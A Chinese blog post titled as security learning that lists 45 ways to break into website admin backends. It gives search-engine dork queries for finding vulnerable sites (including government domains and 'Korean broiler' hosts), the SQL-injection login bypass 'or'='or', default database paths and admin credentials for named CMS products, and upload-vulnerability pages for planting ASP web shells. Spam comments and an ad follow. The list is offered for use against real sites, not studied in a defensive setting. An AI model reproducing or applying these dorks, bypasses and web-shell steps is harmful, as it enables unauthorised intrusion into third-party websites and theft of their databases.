首页 » Web应用 » 安全学习-45种进后台的方法

安全学习-45种进后台的方法

https://www.heibai.org/post/730.html 发布人 go君 十一月 26, 2020 已阅读: 7,552 次    Web应用 7 评论

1、到Google搜索,site:cq.cn inurl:asp

2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

3、利用挖掘鸡和一个ASP木马:

文件名是login.asp

……

路径组是/manage/

关键词是went.asp

用’or’='or’来登陆

4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,成功率不高:

关键字:“Co Net MIB Ver 1.0网站后台管理系统”

帐号密码为 ‘or’='or’

5、动感购物系统,呵呵。想到了明小子:

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞。

6、默认数据库地址blogdata/acblog.asa

关键字:acblog

7、百度 /htdocs

注册里可以直接上传asa文件!

8、/Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version

9、用挖掘机

关键字:Powered by WEBBOY

页面:/upfile.asp

10、baidu中搜索关键字Ver5.0 Build 0519

(存在上传漏洞)

11、Upfile_Article.asp bbs/upfile.asp

输入关键字:powered by mypower ,

应该是动什么上传漏洞来着?用的人也比较多

估计明小子,挖掘鸡就可以了

12、inurl:winnt\system32\inetsrv\

在google里面输入这个就可以找到很多网站

13、现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14、关键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买站内流言友情连接 本站论坛

挖掘鸡的关键字 添 setup.asp

15、VBulletin论坛的数据库

默认数据库地址!

/includes/functi*****.php

工具:

1)网站猎手。下载地址:百度 Google!

2)Google

关键字:

Powered by: vBulletin Version 3.0.1

Powered by: vBulletin Version 3.0.2

Powered by: vBulletin Version 3.0.3

其中一个就可以了

16

1)打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart

open source。

这是一个商场系统。

2)网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~

猜到,comersus.mdb. 是数据库名

数据库都是放在database/ 后的,

所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。

那样把前一个’’store/”除去,再加上database/comersus.mdb 试试

都是默认数据库地址

17、无忧传奇官方站点程序。

1)后台管理地址:http://您的域名/msmiradmin/

或者是 http://您的域名/admin.asp

2)默认后台管理帐号:msmir

3)默认后台管理密码:msmirmsmir 或 msmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb

或者是 http://您的域名/msmirdata/msmirArticle.asa

数据库连接文件为 ***********/Conn.asp

也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`

18、百度里输入/skins/default/

19、利用挖掘机

关键机:power by Discuz

路径:/wish.php

配合:

Discuz!论坛 wish.php远程包含漏洞

……

20、上传漏洞.

工具 : 当然还是明小子了

网站猎手 或者挖掘鸡了。

关键字powered by mypower

检测的页面或文件插入upfile_photo.asp

这个用的人也N多。。

21、新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”

把flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了

\database\#newasp.mdb

如:#xzws.mdb 改成#xzws.mdb

收集的。没试过。。。 – -!

22、通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子

商城**:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成

漏洞页面:upload.asp

upfile_flash.asp

还是上传漏洞拿webshell

23、注射漏洞

百度搜索ioj’s blog

24、动易

列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp

25、

工具:网站猎手

关键词:inurl:Went.asp

后缀:manage/login.asp

口令:’or’='or’

这软件还不是太熟悉。 – -

26、

**魔兽*****

需要的工具:ASP木马 – -!废话了。

明小子

关键字:All Right Reserved Design:游戏联盟

后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb

都默认的。数据库闹下来自己解密吧不多说了。

27、

漏洞是利用管理员iis设置的失误

用baidu 关键字就是比较罕见的脚本名

动网: ReloadForumCache.asp

Leadbbs: makealltopanc.asp

BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp

好像比较少吧不太清楚了这个。。

28、

国外站的爆库漏洞

关键字:sad Raven’s Guestbook

密码地址:/passwd.dat

后台地址:/admin.php

29、

Discuz 4.1.0跨站漏洞

利用工具:1)WAP浏览器

2)WAP编码转换器

关键字:”intextiscuz! 4.1.0″

WAP浏览器…………………………!!

30、

关键字:尚奈克斯

后台路径/system/manage.asp

直接传ASP木马

挖掘机去。。 – -!

31、

工具

1:网站猎手

2:大马

关键字:切勿关闭Cookies功能,否则您将不能登录

插入diy.asp

32、

关键字:Team5 Studio All rights reserved

默认数据库:data/team.mdb

剩下的自己搞。不多说了

33、

工具: 挖掘机 辅臣数据库读取器

关键字: 企业简介 产品展示 产品列表

后缀添加: /database/myszw.mdb

后台地址: admin/Login.asp

都默认的。一样。数据库闹下来自己解密码去 。就行了。。 – -

34、

关键子 XXX inurl:Nclass.asp

……

在”系统设置”里写个木马。

会被保存到 在 config.asp内。

35、

不进后台照样拿动网WEBSHELL

data.asp?action=BackupData 动网数据库备份默认路径

没试过。。。不知道。

36、

工具:网站猎手 WebShell

关键字:inurl:Went.asp

后缀:manage/login.asp

弱口令:’or’='or’

也没试过。 。。。。。。

37、

关键字owered byCDN_NEWS

随便扫遍文章加一个’ ,来试探注入点

后台地址:admin_index.asp

用啥工具我就不说了吧。。。。。。。。。

38、

**雷池新闻发布系统

关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp

再上传马…..

进访问uppic anran.asp 登陆马.

—-

没试过。汗 ,收集来的。

39、

工具挖掘机就行了。

关键字ower System Of Article Management Ver 3.0 Build 20030628

默认数据库:database\yiuwekdsodksldfslwifds.mdb

后台地址:自己扫描!

工具明小子。- -!怎么又是他啊。

MD5自己解………

(NND这个一扫一大堆。大家可以去试试。。)

40、

一、通过GOOGLE搜索找大量注入点

关键字:asp?id=1 gov.jp/ asp?id=

页数:100

语言:想**哪个国家就填什么语言吧

41、

关键字:Powered by:94KKBBS 2005

利用密码找回功能 找回admin

提问:ddddd 回答:ddddd

42、

关键字:inurl:Went.asp

后台为manage/login.asp

后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录 进入

默认数据库地址atabase/DataShop.mdb

43、

关键字:****** inurl:readnews.asp

把最后一个/改成\ ,直接暴库,看密码,进后台

随便添加个新闻 在标题输入我们的一句话木马

44、

工具:一句话木马

BBsXp 5.0 sp1 管理员猜解器

关键词:powered by bbsxp5.00

进后台,备份一句话马!

45、

关键字:程序核心:BJXSHOP网上开店专家

后台:/admin

限量服务器代金券,再不抓紧就没啦!

宝塔服务器面板,一键全能部署及管理,送你3188元礼包,点我领取
  1. It's difficult to find knowledgeable people for this subject, however, you sound like you
    know what you're talking about! Thanks

  2. Hello colleagues, fastidious piece of writing and good urging commented here, I am in fact enjoying by these.

  3. The other day, while I was at work, my cousin stole my iPad and tested to see if it
    can survive a thirty foot drop, just so she can be a youtube sensation. My iPad is now
    destroyed and she has 83 views. I know this is totally
    off topic but I had to share it with someone!

  4. Hello to every one, the contents present at this web site are
    truly awesome for people knowledge, well, keep up the nice work fellows.

  5. not an educational article but an educational article

  6. I'm amazed, I have to admit. Seldom do I encounter a blog that's equally educative and entertaining, and let me tell you, you
    have hit the nail on the head. The issue is something which not enough folks are speaking intelligently about.
    Now i'm very happy I came across this in my hunt for something relating to this.

发表评论

电子邮件地址不会被公开。 必填项已用*标注

解决 : *
27 − 21 =


返回顶部